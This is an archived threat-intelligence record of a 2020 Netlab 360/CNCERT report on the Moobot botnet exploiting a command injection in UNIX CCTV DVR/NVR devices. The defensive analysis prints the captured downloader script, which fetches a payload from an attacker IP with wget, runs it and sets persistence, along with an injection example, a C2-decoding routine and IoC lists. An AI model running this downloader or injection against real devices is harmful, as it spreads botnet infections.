{ "id": "641a7e8b-7df0-4e5d-85ee-d10ed0639c3f", "created_at": "2026-04-06T00:08:48.376701Z", "updated_at": "2026-04-10T13:12:26.563378Z", "deleted_at": null, "sha1_hash": "9684cfcefcee4b636d4a126b7fd54e16c0ff07c6", "title": "MooBot on the run using another 0 day targeting UNIX CCTV DVR", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1148960, "plain_text": "MooBot on the run using another 0 day targeting UNIX CCTV\r\nDVR\r\nBy Hui Wang\r\nPublished: 2020-11-20 · Archived: 2026-04-05 13:43:33 UTC\r\nThis report is jointly issued by CNCERT and Qihoo 360\r\nOverview\r\nMoobot is a botnet we first reported in September 2019[1]. It has been pretty active since its appearance and we\r\nreported before it has the ability to exploit 0day vulnerabilities[2][3] .\r\nIn Jun, we were able to confirm that another 0day had been used by Moobot targeting UNIX CCTV DVR/NVR\r\ndevices(see below for device list). We notified the manufacture and patch has been issued[ALL265 unix\r\n2.3.7.8B09][NVR unix 2.3.7.8B05][ALL unixip 2.3.4.8B06].\r\nTimeline\r\n2020-06-09 We saw the scans targeting the vulnerability\r\n2020-06-24 A Moobot sample spread by exploiting this vulnerability was captured by us\r\n2020-08-24 Manufacturers released patches\r\nVulnerability exploitation process\r\nMoobot scans port 8000 through Loader, after locating the right target device, Moobot samples will be dropped\r\nvia the vulnerabilities.\r\nVulnerability analysis\r\nVulnerability type\r\nRemote command injection vulnerability\r\nVulnerability details\r\nOn the vulnerable devices, a gui process runs and listens to port 8000. According to the device manual, we\r\nknow that this port is the default listening port for DVR Watch, Search, and Setup functions.\r\nhttps://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/\r\nPage 1 of 11\n\nThe port has the function of remotely updating the system time, which is actually implemented by the gui\r\nprocess calling system commands nptdate . This is where the problem is. When the gui program executes the\r\nntpdate command, the NTP server parameters are not checked, resulting in a command injection vulnerability.\r\nFor example, the command ( ntpdate -d -t 1 time.nist.gov\u0026 whoami ) will lead the execution of whoami\r\ncommand. Part of the payload is as follows, we will not share more details or PoC here due to security concern.\r\nAffected equipment analysis\r\nBy scanning the 8000 ports of the entire network, we found about 6k online devices. Most of the equipment is in\r\nthe United States.\r\nGeographical distribution of affected equipment\r\nhttps://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/\r\nPage 2 of 11\n\n4529 United_States\r\n 789 Republic_of_Korea\r\n 84 Canada\r\n 73 Japan\r\n 66 Netherlands\r\n 56 Australia\r\n 55 Germany\r\n 31 United_Kingdom\r\n 23 Viet_Nam\r\n 19 Malaysia\r\n 15 Saudi_Arabia\r\n 15 Czech\r\n 14 Switzerland\r\n 11 China\r\nKnown affected devices:\r\n 51 PVT-N5UNIXDVR 1\r\n 28 PVT-8MUNIXDVR 1\r\n 28 NVST-ILUNIXDVR 1\r\n 25 NVST-ILUNIXNVR 1\r\n 22 Magic-U-8M5UNIXDVR 1\r\n 14 NVST-IPUNIXNVR 1\r\n 13 NVST-IPUNIXDVR 1\r\n 9 Magic-T-8M5UNIXDVR 1\r\n 9 HD-Analog3RDVR 1\r\n 6 Magic-QXUNIXDVR 1\r\n 2 Magic-U-8M5UNIXDVR 2\r\n 1 PVT-8MUNIXDVR\r\n 1 NVR3RGPardisNVR\r\n 1 Magic-U-8M5UNIXBoca DVR\r\n 1 MER-28N16ENEODVR 1\r\n 1 MER-28N08ENEODVR 1\r\nSample analysis\r\nVerdict:Downloader\r\nMD5:af3720d0141d246bd3ede434f7a14dcb\r\nASCII text, with CRLF line terminators\r\naf3720d0141d246bd3ede434f7a14dcb It is a download script, the content is as follows:\r\nhttps://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/\r\nPage 3 of 11\n\ns=o;cd /cmslite;wget http://205.185.116.68/boot -O-|gzip -d \u003e .\"$s\";chmod +x .\"$s\";./.\"$s\" balloon;\r\necho -e \"echo \\\"Starting logging\\\"\\nklogd\\nsyslogd -O /dvr/message -s 4000\\n/cmslite/.o balloon;\" \u003e /etc/init.d/\r\nIt can be seen that the main function of Downloader is\r\nDownload Moobot sample\r\nAchieve persistence\r\nIt is worth mentioning that the downloaded Moobot samples are compressed, which to some extent affect the\r\nsecurity products' detection of samples at the network traffic level.\r\nVerdict:Moobot_leet\r\nMD5:fb96c74e0548bd41621ea0dd98e8b2bb\r\nELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped\r\nPacker:No\r\nLib:uclibc\r\nfb96c74e0548bd41621ea0dd98e8b2bb It is a Moobot variant, based on the reuse of LeetHozer's encryption\r\nmethod, we call it Moobot_leet. Moobot_leet is very similar to Mirai at the host behavior level and has no real\r\nhighlights, so in this blog we will just talk about its encryption method and communication protocol, we see the\r\nsample uses Tor Proxy, and a large number of proxy nodes are embedded, and Tor-C2 is encrypted.\r\nEncryption method\r\nMoobot_leet divides Tor-C2 into two parts: prefix (16 bytes) and suffix (7 bytes) , which exist in different\r\npositions of the sample. LeetHozer's encryption method is being adopted, and the correct Tor-C2 can only be\r\ndecrypted by combining the two parts.\r\nhttps://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/\r\nPage 4 of 11\n\nThe decryption method is as follows:\r\nxorkey=\"qE6MGAbI\"\r\ndef decode_str(ctxt):\r\n for i in range(0,len(xorkey)):\r\n plain=\"\"\r\n size=len(ctxt)\r\n for idx in range(0, size):\r\n ch=ord(ctxt[idx])\r\n ch ^=(ord(xorkey[i]) + idx )\r\n plain += chr(ch)\r\n ctxt=plain\r\n return ctxt\r\n \r\nTake prefix( 0D 02 50 08 10 18 12 06 17 17 61 77 7A 79 6A 97 ) and suffix( CC 81 88 BB BD B8 DE ) as\r\nexamples, splicing to get ciphertext( 0D 02 50 08 10 18 12 06 17 17 61 77 7A 79 6A 97 CC 81 88 BB BD B8\r\nDE ), decryption can get Tor-C2 as ol6zbnlduigehodu.onion .\r\nThe strange thing is that from the code level ( random mod 7 ), it can be seen that there should be 7 Tor-C2, but\r\nthere are only 3 in the actual sample, which will cause the bot to access the non legit Tor-C2. We guess it may be a\r\nmethod used to disrupt security researchers \u0026 to throw false negative to the sandbox IOC automatic extraction\r\nsystem.\r\nCommunication protocol\r\nAn overview of Moobot_leet network traffic is as follows\r\nFirst, establish a connection with the built-in proxy node of the sample, then establish a connection with Tor-C2,\r\nhttps://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/\r\nPage 5 of 11\n\nand finally use the normal Moobot communication protocol to notify C2 it is alive and can receive the attack\r\ncommand issued by C2.\r\n1. Establish a connection with the proxy, the port is 9050\r\nThe list of hardcode proxy nodes in the sample is as follows:\r\n1.26.150.133\r\n104.45.52.37\r\n107.21.38.230\r\n12.11.175.187\r\n128.199.45.26\r\n13.50.100.110\r\n136.243.69.28\r\n138.68.107.137\r\n158.69.33.149\r\n165.22.117.234\r\n173.212.249.65\r\n185.242.114.206\r\n193.29.187.226\r\n193.70.77.132\r\nhttps://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/\r\nPage 6 of 11\n\n20.188.45.175\r\n3.8.5.177\r\n31.6.69.162\r\n35.153.180.187\r\n35.158.231.234\r\n4.21.119.186\r\n45.137.22.80\r\n45.14.148.239\r\n46.101.216.75\r\n5.138.113.101\r\n5.252.225.249\r\n51.11.247.88\r\n51.15.239.174\r\n51.75.144.59\r\n51.77.148.172\r\n62.149.14.80\r\n79.130.136.67\r\n80.241.212.116\r\n82.146.61.193\r\n82.230.81.131\r\n86.177.24.148\r\n89.163.146.187\r\n89.217.41.145\r\n9.43.47.135\r\n9.43.47.39\r\n90.93.30.29\r\n91.228.218.66\r\n92.222.76.104\r\n92.29.22.186\r\n93.104.211.123\r\n94.100.28.172\r\n2. Establish a connection with C2 through Tor-Proxy protocol\r\nThe sample hardcode Tor-C2 list is as follows:\r\nhttps://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/\r\nPage 7 of 11\n\nol6zbnlduigehodu.onion:1900\r\nuajl7qmdquxaramd.onion:554\r\nnhez3ihtwxwthjkm.onion:21\r\n3. Communicate with C2 through the Moobot protocol, the specific go live, heartbeat, and attack packet are\r\nas follows\r\nRegister package\r\n msg parsing\r\n ----------------------------------------------------------------\r\n 33 66 99 -----\u003e hardcoded magic\r\n 07 -----\u003e group string length\r\n 62 61 6c 6c 6f 6f 6e -----\u003e group string,here it is \"balloon\"\r\nHeartbeat package\r\n msg parsing\r\n ----------------------------------------------------------------\r\n c7 15 3a fa -----\u003e random 4 bytes msg from bot\r\n c7 15 3a fa -----\u003e 4 bytes msg from c2\r\nThe attack command is similar to mirai\r\n00000000: 01 00 00 00 3C 01 C2 0F 92 0C 20 02 01 00 05 32 ....\u003c..... ....2\r\n00000010: 38 30 31 35 02 00 04 31 34 36 30 02 1C 8015...1460..\r\nMoobot DDoS campaign\r\nMoobot's DDoS attacks are active all year round, and our previous article also introduced Moobot's attacks [1] .\r\nHere are the DDoS targets launched by Moobot.(we noticed electrum.hodlister.co has been attacked from this\r\nMoobot nonstop for a few months now)\r\nhttps://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/\r\nPage 8 of 11\n\nReaders are always welcomed to reach us on twitter or email us to netlab at 360 dot cn.\r\nIoC\r\nTor-C2\r\ndjq6cvwigo7l7q62.onion:194\r\ndl3ochoifo77lsak.onion:1553\r\nkrjn77m6demafp77.onion:6969\r\nmvo4y3vr7xuxhwcf.onion:21\r\nnhez3ihtwxwthjkm.onion:21\r\nol6zbnlduigehodu.onion:1900\r\nstmptmmm27tco3oh.onion:115\r\ntto6kqp6nsto5din.onion:17\r\nuajl7qmdquxaramd.onion:554\r\nwsvo6jwd3spsb4us.onion:1900\r\nSample MD5\r\n022081bc7f49b4aa5c4b36982390cd97\r\n05764c4d5ec37575d5fd3efe95cf3458\r\n260bda811c00dac88b4f5a35e9939760\r\n30416eae1f1922b28d93be8078b25ba0\r\n348acf45ccb313f6c5d34ca5f68f5e13\r\n3e9ae33e0d5c36f7cd5f576233d83f26\r\n4d785886039cbca5372068377f72da43\r\n565c0456c7fbb393ec483c648155b119\r\n655b56b345799f99b614e23128942b92\r\n7735289d33d14644fea27add188093ea\r\nhttps://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/\r\nPage 9 of 11\n\n7988a73a4b5ccb7ca9b98dc633b8c0c6\r\nb2c66c2831173b1117467fdabc78241e\r\nbb27f755238528fc3c6386287a5c74a7\r\nbff215a95f088672ad13933a1de70861\r\ncb428a513275b5e969353596deb7383d\r\ncf3602498c49caa902d87579fd420098\r\ne24dc070a4d90a7b01389de9f2805b2b\r\nfe0488ec71ee04ddb47792cae199595b\r\nDownloader URL\r\nhttp[://104.244.78.131/boot\r\nhttp[://104.244.78.131/fre\r\nhttp[://107.189.10.28/boot\r\nhttp[://107.189.10.28/fre\r\nhttp[://141.164.63.40/boot\r\nhttp[://141.164.63.40/fre\r\nhttp[://172.104.105.205/boot\r\nhttp[://185.216.140.70/fre\r\nhttp[://185.216.140.70/t\r\nhttp[://185.39.11.84/fre\r\nhttp[://89.248.174.166/t\r\nhttp[://92.223.73.55/fre\r\nhttp[://ape.run/dtf/b\r\nhttp[://ape.run/fre\r\nhttp[://c.uglykr.xyz/fre\r\nhttp[://kreb.xyz/fre\r\nhttp[://osrq.xyz/dtf/b\r\nhttp[://osrq.xyz/fre\r\nScanner IP\r\n176.126.175.10 AS47540|EURODC-AS Romania|Romania|Unknown\r\n176.126.175.8 AS47540|EURODC-AS Romania|Romania|Unknown\r\n185.107.80.202 AS43350|NForce_Entertainment_B.V. Netherlands|North_Brabant|Steenbergen\r\n185.107.80.203 AS43350|NForce_Entertainment_B.V. Netherlands|North_Brabant|Steenbergen\r\n185.107.80.34 AS43350|NForce_Entertainment_B.V. Netherlands|North_Brabant|Steenbergen\r\n185.107.80.62 AS43350|NForce_Entertainment_B.V. Netherlands|North_Brabant|Steenbergen\r\n185.39.11.84 AS62355|Network_Dedicated_SAS Netherlands|North_Holland|Wormer\r\n212.224.124.178 AS44066|First_Colo_GmbH Germany|Hesse|Frankfurt\r\n89.248.174.165 AS202425|IP_Volume_inc Netherlands|North_Holland|Wormer\r\n89.248.174.166 AS202425|IP_Volume_inc Netherlands|North_Holland|Wormer\r\n89.248.174.203 AS202425|IP_Volume_inc Netherlands|North_Holland|Wormer\r\n92.223.73.136 AS199524|G-Core_Labs_S.A. Republic_of_Korea|Seoul|Unknown\r\n92.223.73.54 AS199524|G-Core_Labs_S.A. Republic_of_Korea|Seoul|Unknown\r\nhttps://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/\r\nPage 10 of 11\n\n92.223.73.55 AS199524|G-Core_Labs_S.A. Republic_of_Korea|Seoul|Unknown\r\n92.223.73.72 AS199524|G-Core_Labs_S.A. Republic_of_Korea|Seoul|Unknown\r\nSource: https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/\r\nhttps://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/\r\nPage 11 of 11\n\nsample uses Tor Encryption method Proxy, and a large number of proxy nodes are embedded, and Tor-C2 is encrypted. \nMoobot_leet divides Tor-C2 into two parts: prefix (16 bytes) and suffix (7 bytes) , which exist in different\npositions of the sample. LeetHozer's encryption method is being adopted, and the correct Tor-C2 can only be\ndecrypted by combining the two parts. \n Page 4 of 11 \n\nhttps://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/ \n7988a73a4b5ccb7ca9b98dc633b8c0c6 \nb2c66c2831173b1117467fdabc78241e \nbb27f755238528fc3c6386287a5c74a7 \nbff215a95f088672ad13933a1de70861 \ncb428a513275b5e969353596deb7383d \ncf3602498c49caa902d87579fd420098 \ne24dc070a4d90a7b01389de9f2805b2b \nfe0488ec71ee04ddb47792cae199595b \nDownloader URL \nhttp[://104.244.78.131/boot \nhttp[://104.244.78.131/fre \nhttp[://107.189.10.28/boot \nhttp[://107.189.10.28/fre \nhttp[://141.164.63.40/boot \nhttp[://141.164.63.40/fre \nhttp[://172.104.105.205/boot \nhttp[://185.216.140.70/fre \nhttp[://185.216.140.70/t \nhttp[://185.39.11.84/fre \nhttp[://89.248.174.166/t \nhttp[://92.223.73.55/fre \nhttp[://ape.run/dtf/b \nhttp[://ape.run/fre \nhttp[://c.uglykr.xyz/fre \nhttp[://kreb.xyz/fre \nhttp[://osrq.xyz/dtf/b \nhttp[://osrq.xyz/fre \nScanner IP \n176.126.175.10 AS47540|EURODC-AS Romania|Romania|Unknown\n176.126.175.8 AS47540|EURODC-AS Romania|Romania|Unknown\n185.107.80.202 AS43350|NForce_Entertainment_B.V. Netherlands|North_Brabant|Steenbergen\n185.107.80.203 AS43350|NForce_Entertainment_B.V. Netherlands|North_Brabant|Steenbergen\n185.107.80.34 AS43350|NForce_Entertainment_B.V. Netherlands|North_Brabant|Steenbergen\n185.107.80.62 AS43350|NForce_Entertainment_B.V. Netherlands|North_Brabant|Steenbergen\n185.39.11.84 AS62355|Network_Dedicated_SAS Netherlands|North_Holland|Wormer\n212.224.124.178 AS44066|First_Colo_GmbH Germany|Hesse|Frankfurt\n89.248.174.165 AS202425|IP_Volume_inc Netherlands|North_Holland|Wormer\n89.248.174.166 AS202425|IP_Volume_inc Netherlands|North_Holland|Wormer\n89.248.174.203 AS202425|IP_Volume_inc Netherlands|North_Holland|Wormer\n92.223.73.136 AS199524|G-Core_Labs_S.A. Republic_of_Korea|Seoul|Unknown\n92.223.73.54 AS199524|G-Core_Labs_S.A. Republic_of_Korea|Seoul|Unknown\n Page 10 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/" ], "report_names": [ "moobot-0day-unixcctv-dvr-en" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434128, "ts_updated_at": 1775826746, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9684cfcefcee4b636d4a126b7fd54e16c0ff07c6.pdf", "text": "https://archive.orkl.eu/9684cfcefcee4b636d4a126b7fd54e16c0ff07c6.txt", "img": "https://archive.orkl.eu/9684cfcefcee4b636d4a126b7fd54e16c0ff07c6.jpg" } }